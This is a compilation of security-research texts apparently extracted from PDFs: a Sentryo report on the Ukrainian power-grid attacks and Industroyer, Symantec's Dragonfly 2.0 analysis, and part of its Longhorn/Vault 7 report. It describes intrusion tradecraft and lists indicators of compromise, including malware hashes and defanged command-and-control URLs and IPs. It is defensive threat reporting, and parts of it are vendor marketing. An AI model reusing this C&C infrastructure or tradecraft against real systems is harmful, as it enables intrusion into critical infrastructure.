either direct network connections between IT and OT domains, or laptops or other equipments connected to both domains.
Determining the goal or attributing the malware to a country is quite hard. Russian Rosneft also has been impacted. The Ukrainian
Cyber Police officially confirmed that M.E.Doc servers were backdoored on three different occasions. The total losses, due to the alleged
negligence of Intellect-Service, might be in the range of $1bn considering that St Gobain alone has declared a loss of $250M in revenue.
2015 INCIDENT
Ukraine's
state security service SBU has
blamed Russia but the nation's energy
ministry said it would hold off on
attribution until after it finishes a formal
probe.
press statement on the SBU website
alleged the discovery of malicious
software responsible for these outages on
the networks of regional power companies.
According to the SBU press statement,
the cyberattack was accompanied by a
barrage of phone calls to their technical
support telephone numbers which would
have acted like a denial of service (DoS)
attack.
U.S. cyber intelligence firm iSight
Partners said it has determined that
a Russian hacking group known as
Sandworm caused this unprecedented
power outage in Ukraine. Many other
US based companies are pointing to
Sandworm as the
hacking
unit.
Some
press organizations are claiming
this is the first known Grid hack. They
should remember, even unconfirmed, that
the 2003 blackout in the US east coast
may have been caused by a cyberattack.
Also, the FBI has already claimed that
Daesh has tried unsuccessfully to hack
the national US power grid.
According
to the SANS ICS blog, the
attack was a coordinated effort which
targeted several power sub-companies
and included a flooding attack on their
phone support systems to prevent
legitimate customers from reporting a
power cut which would alert the on-call
personnel to the problem. According to
the same source (unconfirmed), the staff
in the affected companies acted quickly
to bypass the SCADA systems and run
everything in manual mode by acting on
the main breakers which restored service
in under 6 hours. This would not have been
possible in a modern grid installation
which relies heavily on automation and
t be run in
manual mode
Ukrainian telecoms engineer has raised
doubts about the widely reported link
between BlackEnergy attacks and power
outages in his country. Named Illia Illin,
per
The Register
article, he claims
First
of all, there weren't any blackouts in
Boryspil (KBP)
investigation team led by US
government officials has released a
report as part of the ICS-CERT initiative
(see sources section). This report remains
vague about the exact insertion methods
and attacker techniques and focuses
on proactive defenses that would have
prevented the attack. Also, in the current
political context, it
s hard to imagine that
interviews of Ukrainian operators by US
government officials would be 100%
factual and accurate.
SANS
ICS has released a new detailed
report which summarizes the information
collected by the investigation team
(see sources for
DUC5
). The report
uses the Cyber Kill Chain framework to
characterize the different phases of the
attack. However, many technical details
remain vague (especially concerning
attacker reconnaissance and remote
control by VPN). An analysis of the alleged
malware used is provided. The RAT tool
used by the attacker is not mentioned.
2016 INCIDENT
Several assumptions have been released
since this second outage. For the time being,
technical details regarding the attack have
not been published. The only
technical
finding is the threat vector. Indeed, the
SCADA stations had been compromised by
an external source. Marina Krotofil, lead
cyber-security researcher at Honeywell who
assisted in the investigation, declared
It was
an intentional cyber incident not meant to be
on a large scale... they actually attacked more
but couldn
t achieve all their goals
. Also from
Marina Krotofil,
hackers are thought to have
hidden in Ukrenergo
s IT network undetected
for six months, acquiring privileges to access
systems and figure out their workings, before
taking methodical steps to take the power
offline
. So far, we have no information
confirming that the techniques used are the
same or not.
According to CyberX, the malware used
during the BugDrop operation detailed in the
facts section could have been used during
the reconnaissance phase. Indeed, the
compilation date and some targets may lead
to this conclusion. The malware was compiled
several times between June 2016 and end of
October 2016. Concerning identified targets
here is the list:
A company that designs remote
monitoring systems for oil & gas
pipeline infrastructures.
An international organization that
monitors human rights, counter-terrorism
and cyberattacks on critical infrastructure
in the Ukraine.
An engineering company that designs
electrical substations, gas distribution
pipelines, and water supply plants.
A scientific research institute.
Editors of Ukrainian newspapers.
The assumption linking this malware and
the attack is based on these targets mainly
located in Ukraine and linked to energy but
also due to techniques used like the reflective
DLL injection (loading malicious code without
calling the normal Windows API calls) which
was used during the first attack. Another hint
comes from the compilation time.
SENTRYO ICS CYBERVISION OFFERS AN OT MONITORING SOLUTION THAT
PROVIDES AN OPERATIONAL CAPACITY TO PREVENT, DETECT
AND RESPOND TO CYBERAT TACKS.
ICS CyberVision continuously listen communications between
devices on the OT network and extract meaningful data. Those
data are then used to create a behavorial
template
of the OT
network which is then used as a white list to detect anomalies.
ICS CyberVision use IA algorithms to caracterise and prioritize
those anomalies in order to eliminate false positive and facilitate
the remediation process. In addition scripts from Sentryo Security
Labs are provided to ICS CyberVision users. These scripts use the
CyberVision Center API to mine their CyberVision installations to
check for some Indicators of Compromise (IOC).
In the case of organization is in the energy sector and may have
been targeted by this new Black Energy campaign or the latest
Grizzly Steppe (see the DHS report), we strongly encourage them
to run these scripts and check their ICS.
Moreover, if ICS CyberVision had been deployed inside the process
and control networks of an Energy corporation, it would have
detected several weak signals enabling the local team to stop the
attacks early:
Regarding
Black Energy, ICS CyberVision would have detected
unknown connections to a remote Internet website (the C&C
channels). These connections would have been seen as a change
compared to the baseline (a set of given network behaviors)
defined by plant operators.
Regarding
Industroyer/CrashOverride, ICS CyberVision would
have detected any new connections to a remote Internet website
(the C&C channels), and also new and strange behaviours on
the OT networks like multiple OT network scans and critical OT
communications like orders.
Regarding
the Disakil
wiper
, ICS CyberVision would have
detected the disappearance of TCP connections between the
SCADA stations and the PLCs / RTUs. The defined baseline
includes these connections and the fact that they stopped being
active would have automatically been detected as a change by
the difference engine.
Regarding
the breaker manipulation, ICS CyberVision would have
analysed IEC 101 (serial over ethernet) flows and detected the
order to open up the breaker and to switch off power. CyberVision
would help to trace down the hackers to particular infected
machines.
Regarding
the Siemens safety equipment DoS vulnerability
used by Industroyer (CVE-2015-5374), it will be detected by ICS
Cybervision thanks to its Knowledge Database. Back in 2015,
Siemens provided a firmware update fixing this issue. It is even
more important today to patch these equipments. Our solution
can help by clearly identifying the potentially affected devices
in the network.
The only vector which would have remained undetected by ICS
CyberVision is the
dropper
i.e. an Excel spreadsheet or Word
document in later case. It is the responsibility of an email gateway
or an endpoint protection software to detect such attack vectors.
The malware could also have been inserted via a malicious USB
drive and only endpoint protection software can prevent these
attacks.
Since Stuxnet, the malware Industroyer / CrashOverride is the first
advanced and targeted industrial malware we have seen with this
level of maturity. From a defense point of view, this malware also
shows the need for an ICS network security monitoring capability
to be able to detect these advanced attacks early in the kill chain.
s have look at the kill chain and the malware impact. This is important because investigations are still ongoing and some information
may have not been communicated. Because of this, Phase 1 and part of the Phase 2 are pure assumptions using our experience and
external claims:
PHASE 1
PREPARATION
1. RECONNAISSANCE
harvesting for email; industrial protocol used and target proxy configuration
2. WEAPONIZATION
development of the malware including the dropper, industrial payloads, the backdoor,
the wiper and the C&C server
PHASE 2
INTRUSION
3. DELIVERY
probably an email with a link or an attachment to the dropper
4. EXPLOITATION
find and exploit a vulnerability on the victim
s computer to be able to install the malware
5. INSTALLATION
install the malware as a non-critical Windows service program and install a new malicious
Microsoft Notepad program
PHASE 3
ACTIVE BREACH
6. COMMAND & CONTROL ( C&C OR C2)
communicate regularly with the C&C
(the active period can be configured)
7. ACTIONS AND OBJECTIVES
scan the network using embedded payloads and configuration files dropped
by the C&C; detect any breaker; turn it off and use the wiper.
BY VYTAUTAS BUTRIMAS - SUBJECT MAT TER EXPERT,
RESEARCH AND LESSONS LEARNED DIVISION, NATO ENERGY
SECURITY CENTER OF EXCELLENCE 2
Today
s cyber attacker is several steps
ahead of the defender. This is especially
so in the case of a single operator trying
to defend against a state resourced APT
attacker. This is an unfair match, similar
to a high-school soccer team
s chances
of defeating a FIFA World Cup contender.
It is no contest unless the school team
capabilities are significantly enhanced. It
is important to realize that the operatordefender has a complex task of managing
and protecting increasingly interconnected
and sophisticated systems enabled with
the latest advances in information and
communications technologies (ITC).
Technologies that in addition to providing
new features and possibilities for remote
management and control also introduce
vulnerabilities for an adversary to exploit.
The operator now faces a difficult challenge
in managing systems that are vulnerable to
not only intentional but also unintentional
cyber incidents. Incidents that result from
errors in managing interconnected and
complex systems. The attacker needs only
to find a single weakness in the design or
exposed vulnerability in order to defeat all
the wide-ranging efforts of the defender.
In order for the operator of critical
infrastructure to avoid becoming an isolated
target for an adversary that often is several
steps ahead of the defender he must improve
his relationship among operators of critical
infrastructure, manufacturers, academia and
Government institutions responsible for
cybersecurity. The aim should be in setting
up a mechanism that will facilitate the
timely sharing of information on cyber
threats, coordinating a response to an
incident and sharing lessons learned.
At the local level, National cybersecurity
councils that represent the communities
of interest (CoI) should be created as a first
step in setting up a national cybersecurity
capacity for protecting critical infrastructure
from these advanced and persistent threats
from cyberspace.
of the problem. In addition to the high level
National council a working level network
for timely sharing of threat information
and lessons learned should be created
for dealing with immediate issues and
facilitating coordinated effective response
in times of emergency. In summary it is
only through cooperation and sharing of
information among a community of interest
that an operator-defender can hope to
deal with today's advanced and persistent
threats emanating from cyberspace.
This is not an easy task since fear of
lawsuits, embarrassment and concerns for
confidentiality often make operators as
well as manufacturers of control equipment
reluctant to share the information needed
to enhance resilience and enhance recovery
capabilities. This lack of sharing can only
contribute to making defenders more
isolated and less aware of the significance
The views expressed by V. Butrimas are for NATO, NATO member countries, NATO partners, related private and public institutions and related individuals. These views
do not represent the opinions or policies of NATO or NATO ENSEC COE or any other institution. The views presented in the articles are those of the authors alone.
THIS CASE DEMONSTRATES
THAT IS VERY HARD TO:
COLLECT ENOUGH DATA TO HAVE A DEEP TECHNICAL
UNDERSTANDING OF THE HACKERS TECHNIQUES AND
TACTICS,
ESTABLISH THE IDENTITY OF THE DIFFERENT
ACTORS,
KNOW IF THE CYBERAT TACK WAS SPECIFICALLY
BUILT TO IMPACT ONLY THIS INDUSTRIAL FACILITY,
MAKING THE DIFFERENCE BETWEEN FACTS AND
CLAIMS.
The case also demonstrates the absolute need for a monitoring
capability on such ICS systems. Indeed, this kind of attack is quite
hard to avoid when your IT network has been infected. Nevertheless,
with adapted tools, hints of attack and / or compromission on the
industrial network can be detected in order to prevent and / or
mitigate the attack as soon as possible.
Everyone reading cybersecurity reports must keep in mind that
Ukraine is at war with Russia. This tense international context
probably explains the large number of different
statements
made by the Ukrainian and Russian governments.
In any case, this cyberattack should not be seen as a new Stuxnet.
Black Energy is a quite old malware. No zero-day (i.e. unknown
attack vector) was used. The destruction payloads, even if they
are very impactful, are quite trivial without a fine-grained PLC
reprogrammation. This attack underlines the extreme weakness
of OT components which were never designed with maliciousness
in mind.
As always, the Sentryo security team is deeply involved in the
identification and analysis of the latest industrial threat vectors. We
will follow the ongoing investigation related to the Ukraine attack.
FROM THE FOREWORD
Critical Infrastructure:
refers to assets of physical
and computer-based systems that are essential to the
minimum operations of an economy and its government.
They include
telecommunications, energy, banking and
finance, transportation, water systems and emergency
services, both government and private.
http://www.infracritical.com/?page_id=73
Langner, R., To Kill a Centrifuge,
http://www.langner.com/en/wp-content/uploads/2013/11/
To- kill-a-centrifuge.pdf
Rashid, F., Inside The Aftermath Of The Saudi Aramco
Breach, Dark Reading, 8/8/2015
http://www.darkreading.com/attacks-breaches/inside-theaftermath-of-the- saudi-aramco-breach/d/d-id/1321676
Alert (ICS-ALERT-14-281-01E) Ongoing Sophisticated
Malware Campaign Compromising ICS (Update E) US
ICS-CERT
https://ics-cert.us- cert.gov/alerts/ICS-ALERT- 14-281- 01B
Original release date: December 10, 2014
http://www.welivesecurity.com/2016/01/20/new-waveattacks-ukrainian-power-industry/
https://securelist.com/blog/research/73440/blackenergyapt-attacks-in-ukraine-employ-spearphishing-with-worddocuments/
https://www.sentinelone.com/wp-content/
uploads/2016/01/BlackEnergy3_WP_012716_1c.pdf
https://ics.sans.org/blog/2016/01/09/confirmation-of-acoordinated-attack-on-the-ukrainian-power-grid
https://ics-cert.us-cert.gov/alerts/IR-ALERT-H-16-056-01
https://ics.sans.org/duc5
http://www.reuters.com/article/us-ukraine-cyber-attackenergy-idUSKBN1521BA
https://motherboard.vice.com/en_us/article/there-willalways-be-internet-outages-so-buckle-up
https://www.youtube.com/watch?v=lTwsDLO3C44
Sandworm and SCADA, Trend Micro
http://blog.trendmicro.com/sandworm-and-scada/ October
16, 2014
https://motherboard.vice.com/en_us/article/who-hackedthe-lights-in-ukraine
The State of IT Security in Germany 2014, Federal IT
Department (BSI) Germany. p. 31.
https://www.bsi.bund.de/SharedDocs/Downloads/EN/BSI/
Publications/Securitysituation/IT-Security-Situation-inGermany- 2014.pdf?__blob=publicationFile&v=3
CLAIMS
FIRST INCIDENT REPORTS
http://www.oe.if.ua/showarticle.php?id=3413
http://briz.if.ua/33432.htm
SECOND INCIDENT REPORTS
http://www.ukrenergo.energy.gov.ua/pages/en/detailsnew.
aspx?nid=3387
http://www.theregister.co.uk/2016/01/27/ukraine_
blackenergy_analysis/
https://cyberx-labs.com/en/blog/operation-bugdropcyberx-discovers-large-scale-cyber-reconnaissanceoperation/
http://in.reuters.com/article/ukraine-crisis-cyber-attacksidINKBN1491QI
http://cert.gov.ua/?p=2464
GCAT C&C CONTROL USING GMAIL
http://www.reuters.com/article/us-ukraine-cyber-attackenergy-idUSKBN1521BA
https://github.com/byt3bl33d3r/gcat
INTECH / ISA ANALYSIS
NATO CCD COA
InTech, March/April 2017 issue, special section
Cybersecurity
, a publication of the International
Society of Automation
wwww.isa.org/intech
https://ccdcoe.org/multimedia/cyber-war-perspectiverussian-aggression-against-ukraine.html
DETAILED ANALYSIS
https://www.us-cert.gov/sites/default/files/publications/
JAR_16-20296A_GRIZZLY%20STEPPE-2016-1229.pdf
http://www.welivesecurity.com/2016/01/03/blackenergysshbeardoor-details-2015-attacks-ukrainian-news-mediaelectric-industry/
http://www.symantec.com/connect/blogs/destructivedisakil-malware-linked-ukraine-power-outages-also-usedagainst-media-organizations
GRIZZLY STEPPE DHS
BLACKHAT 2016 TALK
Author: Geers
Cyber War In Perspective Analysis From The
Crisis In Ukraine
Marina Krotofil at s4x17 Miam introducing the attack and the
talk from Oleskii Yasinskiy:
https://www.youtube.com/watch?v=lTwsDLO3C44
Oleskii Yasinskiy from http://www.issp.ua/
https://www.youtube.com/watch?v=3uPvps3l1Yc
VSEVOLOD KOVALCHUK
S FACEBOOK
STATEMENT FOLLOWING THE SECOND
ATTACK
ICS-CERT ALERT (TA17-163A)
CRASHOVERRIDE MALWARE
https://www.us-cert.gov/ncas/alerts/TA17-163A
THE COMPLETE ESET REPORT
https://www.welivesecurity.com/2017/06/12/industroyerbiggest-threat-industrial-control-systems-since-stuxnet/
THE DRAGOS REPORT
https://dragos.com/blog/crashoverride/CrashOverride-01.pdf
Other sources are confidential.
66 Boulevard Niels Bohr
timent CEI 1 CS 52132
69603 Cedex, Villeurbanne
09 70 75 34 80
www.sentryo.net
@sentryo
Dragonfly: Western energy sector targeted by sophisticated
attack group
symantec.com /connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group
9/5/2017
The energy sector in Europe and North America is being targeted by a new wave of cyber attacks that could provide
attackers with the means to severely disrupt affected operations. The group behind these attacks is known as
Dragonfly. The group has been in operation since at least 2011 but has re-emerged over the past two years from a
quiet period following exposure by Symantec and a number of other researchers in 2014. This
Dragonfly 2.0
campaign, which appears to have begun in late 2015, shares tactics and tools used in earlier campaigns by the
group.
The energy sector has become an area of increased interest to cyber attackers over the past two years. Most
notably, disruptions to Ukraine
s power system in 2015 and 2016 were attributed to a cyber attack and led to power
outages affecting hundreds of thousands of people. In recent months, there have also been media reports of
attempted attacks on the electricity grids in some European countries, as well as reports of companies that manage
nuclear facilities in the U.S. being compromised by hackers.
The Dragonfly group appears to be interested in both learning how energy facilities operate and also gaining access
to operational systems themselves, to the extent that the group now potentially has the ability to sabotage or gain
control of these systems should it decide to do so. Symantec customers are protected against the activities of the
Dragonfly group.
Figure 1. An outline of the Dragonfly group's activities in its most recent campaign
Dragonfly 2.0
Symantec has evidence indicating that the Dragonfly 2.0 campaign has been underway since at least December
2015 and has identified a distinct increase in activity in 2017.
Symantec has strong indications of attacker activity in organizations in the U.S., Turkey, and Switzerland, with
traces of activity in organizations outside of these countries. The U.S. and Turkey were also among the countries
targeted by Dragonfly in its earlier campaign, though the focus on organizations in Turkey does appear to have
increased dramatically in this more recent campaign.
As it did in its prior campaign between 2011 and 2014, Dragonfly 2.0 uses a variety of infection vectors in an effort to
gain access to a victim
s network, including malicious emails, watering hole attacks, and Trojanized software.
The earliest activity identified by Symantec in this renewed campaign was a malicious email campaign that sent
emails disguised as an invitation to a New Year
s Eve party to targets in the energy sector in December 2015.
The group conducted further targeted malicious email campaigns during 2016 and into 2017. The emails contained
very specific content related to the energy sector, as well as some related to general business concerns. Once
opened, the attached malicious document would attempt to leak victims
network credentials to a server outside of
the targeted organization.
In July, Cisco blogged about email-based attacks targeting the energy sector using a toolkit called Phishery. Some
of the emails sent in 2017 that were observed by Symantec were also using the Phishery toolkit (Trojan.Phisherly),
to steal victims
credentials via a template injection attack. This toolkit became generally available on GitHub in late
2016,
As well as sending malicious emails, the attackers also used watering hole attacks to harvest network credentials,
by compromising websites that were likely to be visited by those involved in the energy sector.
The stolen credentials were then used in follow-up attacks against the target organizations. In one instance, after a
victim visited one of the compromised servers, Backdoor.Goodor was installed on their machine via PowerShell 11
days later. Backdoor.Goodor provides the attackers with remote access to the victim
s machine.
In 2014, Symantec observed the Dragonfly group compromise legitimate software in order to deliver malware to
victims, a practice also employed in the earlier 2011 campaigns. In the 2016 and 2017 campaigns the group is using
the evasion framework Shellter in order to develop Trojanized applications. In particular, Backdoor.Dorshel was
delivered as a trojanized version of standard Windows applications.
Symantec also has evidence to suggest that files masquerading as Flash updates may be used to install malicious
backdoors onto target networks
perhaps by using social engineering to convince a victim they needed to download
an update for their Flash player. Shortly after visiting specific URLs, a file named
install_flash_player.exe
was seen
on victim computers, followed shortly by the Trojan.Karagany.B backdoor.
Typically, the attackers will install one or two backdoors onto victim computers to give them remote access and allow
them to install additional tools if necessary. Goodor, Karagany.B, and Dorshel are examples of backdoors used,
along with Trojan.Heriplor.
Western energy sector at risk from ongoing cyber attacks, with potential for sabotage #dragonfly
Strong links with earlier campaigns
There are a number of indicators linking recent activity with earlier Dragonfly campaigns. In particular, the Heriplor
and Karagany Trojans used in Dragonfly 2.0 were both also used in the earlier Dragonfly campaigns between 2011
and 2014.
Trojan.Heriplor is a backdoor that appears to be exclusively used by Dragonfly, and is one of the strongest
indications that the group that targeted the western energy sector between 2011 and 2014 is the same group that is
behind the more recent attacks. This custom malware is not available on the black market, and has not been
observed being used by any other known attack groups. It has only ever been seen being used in attacks against
targets in the energy sector.
Trojan.Karagany.B is an evolution of Trojan.Karagany, which was previously used by Dragonfly, and there are
similarities in the commands, encryption, and code routines used by the two Trojans. Trojan.Karagny.B doesn
appear to be widely available, and has been consistently observed being used in attacks against the energy sector.
However, the earlier Trojan.Karagany was leaked on underground markets, so its use by Dragonfly is not
necessarily exclusive.
Feature
Dragonfly (2013-2014) Dragonfly 2.0 (2015-2017) Link strength
Backdoor.Oldrea
None
Trojan.Heriplor (Oldrea stage II)
Strong
Trojan.Karagany
Yes (Trojan.Karagany.B)
Medium-Strong
Trojan.Listrix (Karagany stage II)
Medium-Strong
Western
energy sector targeted Yes
Medium
Strategic website compromises
Weak
Phishing emails
Weak
Trojanized applications
Weak
Figure 2. Links between current and earlier Dragonfly cyber attack campaigns
Potential for sabotage
Sabotage attacks are typically preceded by an intelligence-gathering phase where attackers collect information
about target networks and systems and acquire credentials that will be used in later campaigns. The most notable
examples of this are Stuxnet and Shamoon, where previously stolen credentials were subsequently used to
administer their destructive payloads.
The original Dragonfly campaigns now appear to have been a more exploratory phase where the attackers were
simply trying to gain access to the networks of targeted organizations. The Dragonfly 2.0 campaigns show how the
attackers may be entering into a new phase, with recent campaigns potentially providing them with access to
operational systems, access that could be used for more disruptive purposes in future.
The most concerning evidence of this is in their use of screen captures. In one particular instance the attackers used
a clear format for naming the screen capture files, [machine description and location].[organization name]. The
string
cntrl
(control) is used in many of the machine descriptions, possibly indicating that these machines have
access to operational systems.
Numerous organizations breached in six-year campaign against the energy sector #dragonfly
Clues or false flags?
While Symantec cannot definitively determine Dragonfly
s origins, this is clearly an accomplished attack group. It is
capable of compromising targeted organizations through a variety of methods; can steal credentials to traverse
targeted networks; and has a range of malware tools available to it, some of which appear to have been custom
developed. Dragonfly is a highly focused group, carrying out targeted attacks on energy sector targets since at least
2011, with a renewed ramping up of activity observed in the last year.
Some of the group
s activity appears to be aimed at making it more difficult to determine who precisely is behind it:
The attackers used more generally available malware and
living off the land
tools, such as administration
tools like PowerShell, PsExec, and Bitsadmin, which may be part of a strategy to make attribution more
difficult. The Phishery toolkit became available on Github in 2016, and a tool used by the group
Screenutil
also appears to use some code from CodeProject.
The attackers also did not use any zero days. As with the group
s use of publicly available tools, this could be
an attempt to deliberately thwart attribution, or it could indicate a lack of resources.
Some code strings in the malware were in Russian. However, some were also in French, which indicates that
one of these languages may be a false flag.
Conflicting evidence and what appear to be attempts at misattribution make it difficult to definitively state where this
attack group is based or who is behind it.
What is clear is that Dragonfly is a highly experienced threat actor, capable of compromising numerous
organizations, stealing information, and gaining access to key systems. What it plans to do with all this intelligence
has yet to become clear, but its capabilities do extend to materially disrupting targeted organizations should it
choose to do so.
Protection
Symantec customers are protected against Dragonfly activity, Symantec has also made efforts to notify identified
targets of recent Dragonfly activity.
Symantec has the following specific detections in place for the threats called out in this blog:
Symantec has also developed a list of Indicators of Compromise to assist in identifying Dragonfly activity:
Family
Command & Control
Backdoor.Dorshel
b3b5d67f5bbf5a043f5bf5d079dbcb56
hxxp://103.41.177.69/A56WY
Trojan.Karagany.B
1560f68403c5a41e96b28d3f882de7f1
hxxp://37.1.202.26/getimage/622622.jpg
Trojan.Heriplor
e02603178c8c47d198f7d34bcf2d68b8
Trojan.Listrix
da9d8c78efe0c6c8be70e6b857400fb1
Hacktool.Credrix
a4cf567f27f3b2f8b73ae15e2e487f00
Backdoor.Goodor
765fcd7588b1d94008975c4627c8feb6
Trojan.Phisherly
141e78d16456a072c9697454fc6d5f58
Screenutil
db07e1740152e09610ea826655d27e8d
184.154.150.66
Customers of the DeepSight Intelligence Managed Adversary and Threat Intelligence (MATI) service have
previously received reporting on the Dragonfly 2.0 group, which included methods of detecting and thwarting the
activities of this adversary.
Best Practices
Dragonfly relies heavily on stolen credentials to compromise a network. Important passwords, such as those
with high privileges, should be at least 8-10 characters long (and preferably longer) and include a mixture of
letters and numbers. Encourage users to avoid reusing the same passwords on multiple websites and
sharing passwords with others should be forbidden. Delete unused credentials and profiles and limit the
number of administrative-level profiles created. Employ two-factor authentication (such as Symantec VIP) to
provide an additional layer of security, preventing any stolen credentials from being used by attackers.
Emphasize multiple, overlapping, and mutually supportive defensive systems to guard against single point
failures in any specific technology or protection method. This should include the deployment of regularly
updated firewalls as well as gateway antivirus, intrusion detection or protection systems (IPS), website
vulnerability with malware protection, and web security gateway solutions throughout the network.
Implement and enforce a security policy whereby any sensitive data is encrypted at rest and in transit. Ensure
that customer data is encrypted as well. This can help mitigate the damage of potential data leaks from within
an organization.
Implement SMB egress traffic filtering on perimeter devices to prevent SMB traffic leaving your network onto
the internet.
Educate employees on the dangers posed by spear-phishing emails, including exercising caution around
emails from unfamiliar sources and opening attachments that haven
t been solicited. A full protection stack
helps to defend against emailed threats, including Symantec Email Security.cloud, which can block emailborne threats, and Symantec Endpoint Protection, which can block malware on the endpoint. Symantec
Messaging Gateway
s Disarm technology can also protect computers from threats by removing malicious
content from attached documents before they even reach the user.
Understanding the tools, techniques, and procedures (TTP) of adversaries through services like DeepSight
Adversary Intelligence fuels effective defense from advanced adversaries like Dragonfly 2.0. Beyond
technical understanding of the group, strategic intelligence that informs the motivation, capability, and likely
next moves of the adversaries ensures more timely and effective decisions in proactively safeguarding your
environment from these threats.
Tags: Security, Endpoint Protection, Endpoint Protection Cloud, Security Response, Dragonfly, energy
sector, sabotage, Switzerland, targeted attacks, Turkey, U.S.
Longhorn: Tools used by cyberespionage group linked to
Vault 7
symantec.com/connect/blogs/longhorn-tools-used-cyberespionage-group-linked-vault-7
April 9, 2017
First evidence linking Vault 7 tools to known cyberattacks.
By: Symantec Security ResponseSymantec Employee
Created 10 Apr 2017
Spying tools and operational protocols detailed in the recent Vault 7 leak have been used in
cyberattacks against at least 40 targets in 16 different countries by a group Symantec calls
Longhorn. Symantec has been protecting its customers from Longhorn
s tools for the past
three years and has continued to track the group in order to learn more about its tools, tactics,
and procedures.
The tools used by Longhorn closely follow development timelines and technical specifications
laid out in documents disclosed by WikiLeaks. The Longhorn group shares some of the same
cryptographic protocols specified in the Vault 7 documents, in addition to following leaked
guidelines on tactics to avoid detection. Given the close similarities between the tools and
techniques, there can be little doubt that Longhorn's activities and the Vault 7 documents are
the work of the same group.
Who is Longhorn?
Longhorn has been active since at least 2011. It has used a range of back door Trojans in
addition to zero-day vulnerabilities to compromise its targets. Longhorn has infiltrated
governments and internationally operating organizations, in addition to targets in the financial,
telecoms, energy, aerospace, information technology, education, and natural resources
sectors. All of the organizations targeted would be of interest to a nation-state attacker.
Longhorn has infected 40 targets in at least 16 countries across the Middle East, Europe, Asia,
and Africa. On one occasion a computer in the United States was compromised but, following
infection, an uninstaller was launched within hours, which may indicate this victim was infected
unintentionally.
#Vault7 linked #Longhorn group infiltrated governments, international orgs, other targets
The link to Vault 7
A number of documents disclosed by WikiLeaks outline specifications and requirements for
malware tools. One document is a development timeline for a piece of malware called
Fluxwire, containing a changelog of dates for when new features were incorporated. These
dates align closely with the development of one Longhorn tool (Trojan.Corentry) tracked by
Symantec. New features in Corentry consistently appeared in samples obtained by Symantec
either on the same date listed in the Vault 7 document or several days later, leaving little doubt
that Corentry is the malware described in the leaked document.
Early versions of Corentry seen by Symantec contained a reference to the file path for the
Fluxwire program database (PDB) file. The Vault 7 document lists removal of the full path for
the PDB as one of the changes implemented in Version 3.5.0.
Up until 2014, versions of Corentry were compiled using GCC. According to the Vault 7
document, Fluxwire switched to a MSVC compiler for version 3.3.0 on February 25, 2015. This
was reflected in samples of Corentry, where a version compiled on February 25, 2015 had
used MSVC as a compiler.
Date/time
of sample
compilation
Embedded
Corentry
version
number
Corentry
compiler
e20d5255d8ab1ff5f157847d2f3ffb25
23/08/2013
10:20
5df76f1ad59e019e52862585d27f1de2
Vault 7
changelog
number
Vault 7
changelog
date
2.1.0 2.4.1
Jan 12,
2011 - Feb
28, 2013
3.0.0
3.0.0
Aug 23,
2013
21/02/2014
11:07
3.1.0
3.1.0
Feb 20,
2014
318d8b61d642274dd0513c293e535b38
15/05/2014
09:01
3.1.1
3.1.1
May 14,
2014
3.2.0
Jul 15,
2014
511a473e26e7f10947561ded8f73ffd0
03/09/2014
00:12
3.2.1
3.2.1
Aug 18,
2014
c06d422656ca69827f63802667723932
25/02/2015
16:50
MSVC
3.3.0
Feb 25,
2015
3.3.1 ->
3.5.0
May 17,
2015 ->
Nov 13,
2015
Corentry sample (MD5 hash)
Table. Corentry version numbers and compilation dates compared to Fluxwire version
numbers and changelog dates disclosed in Vault 7
A second Vault 7 document details Fire and Forget, a specification for user-mode injection of a
payload by a tool called Archangel. The specification of the payload and the interface used to
load it was closely matched in another Longhorn tool called Backdoor.Plexor.
A third document outlines cryptographic protocols that malware tools should follow. These
include the use of inner cryptography within SSL to prevent man-in-the-middle (MITM) attacks,
key exchange once per connection, and use of AES with a 32-byte key. These requirements
align with the cryptographic practices observed by Symantec in all of the Longhorn tools.
Other Vault 7 documents outline tradecraft practices to be used, such as use of the Real-time
Transport Protocol (RTP) as a means of command and control (C&C) communications,
employing wipe-on-use as standard practice, in-memory string de-obfuscation, using a unique
deployment-time key for string obfuscation, and the use of secure erase protocols involving
renaming and overwriting. Symantec has observed Longhorn tools following all of these
practices. While other malware families are known to use some of these practices, the fact that
so many of them are followed by Longhorn makes it noteworthy.
Global reach: Longhorn
s operations
While active since at least 2011, with some evidence of activity dating back as far as 2007,
Longhorn first came to Symantec
s attention in 2014 with the use of a zero-day exploit (CVE2014-4148) embedded in a Word document to infect a target with Plexor.
The malware had all the hallmarks of a sophisticated cyberespionage group. Aside from
access to zero-day exploits, the group had preconfigured Plexor with elements that indicated
prior knowledge of the target environment.
To date, Symantec has found evidence of Longhorn activities against 40 targets spread across
16 different countries. Symantec has seen Longhorn use four different malware tools against
its targets: Corentry, Plexor, Backdoor.Trojan.LH1, and Backdoor.Trojan.LH2.
Before deploying malware to a target, the Longhorn group will preconfigure it with what
appears to be target-specific code words and distinct C&C domains and IP addresses for
communications back to the attackers. Longhorn tools have embedded capitalized code
words, internally referenced as
groupid
and
siteid
, which may be used to identify campaigns
and victims. Over 40 of these identifiers have been observed, and typically follow the theme of
movies, characters, food, or music. One example was a nod to the band The Police, with the
code words REDLIGHT and ROXANNE used.
Longhorn
s malware has an extensive list of commands for remote control of the infected
computer. Most of the malware can also be customized with additional plugins and modules,
some of which have been observed by Symantec.
Longhorn
s malware appears to be specifically built for espionage-type operations, with
detailed system fingerprinting, discovery, and exfiltration capabilities. The malware uses a high
degree of operational security, communicating externally at only select times, with upload
limits on exfiltrated data, and randomization of communication intervals
all attempts to stay
under the radar during intrusions.
For C&C servers, Longhorn typically configures a specific domain and IP address combination
per target. The domains appear to be registered by the attackers; however they use privacy
services to hide their real identity. The IP addresses are typically owned by legitimate
companies offering virtual private server (VPS) or webhosting services. The malware
communicates with C&C servers over HTTPS using a custom underlying cryptographic
protocol to protect communications from identification.
Prior to the Vault 7 leak, Symantec
s assessment of Longhorn was that it was a well-resourced
organization which was involved in intelligence gathering operations. This assessment was
based on its global range of targets and access to a range of comprehensively developed
malware and zero-day exploits. The group appeared to work a standard Monday to Friday
working week, based on timestamps and domain name registration dates, behavior which is
consistent with state-sponsored groups.
Symantec
s analysis uncovered a number of indicators that Longhorn was from an Englishspeaking, North American country. The acronym MTWRFSU (Monday Tuesday Wednesday
ThuRsday Friday Saturday SUnday) was used to configure which day of the week malware
would communicate with the attackers. This acronym is common in academic calendars in
North America. Some of the code words found in the malware, such as SCOOBYSNACK,
would be most familiar in North America. In addition to this, the compilation times of tools with
reliable timestamps indicate a time zone in the Americas.
Distinctive fingerprints
Longhorn has used advanced malware tools and zero-day vulnerabilities to infiltrate a string of
targets worldwide. Taken in combination, the tools, techniques, and procedures employed by
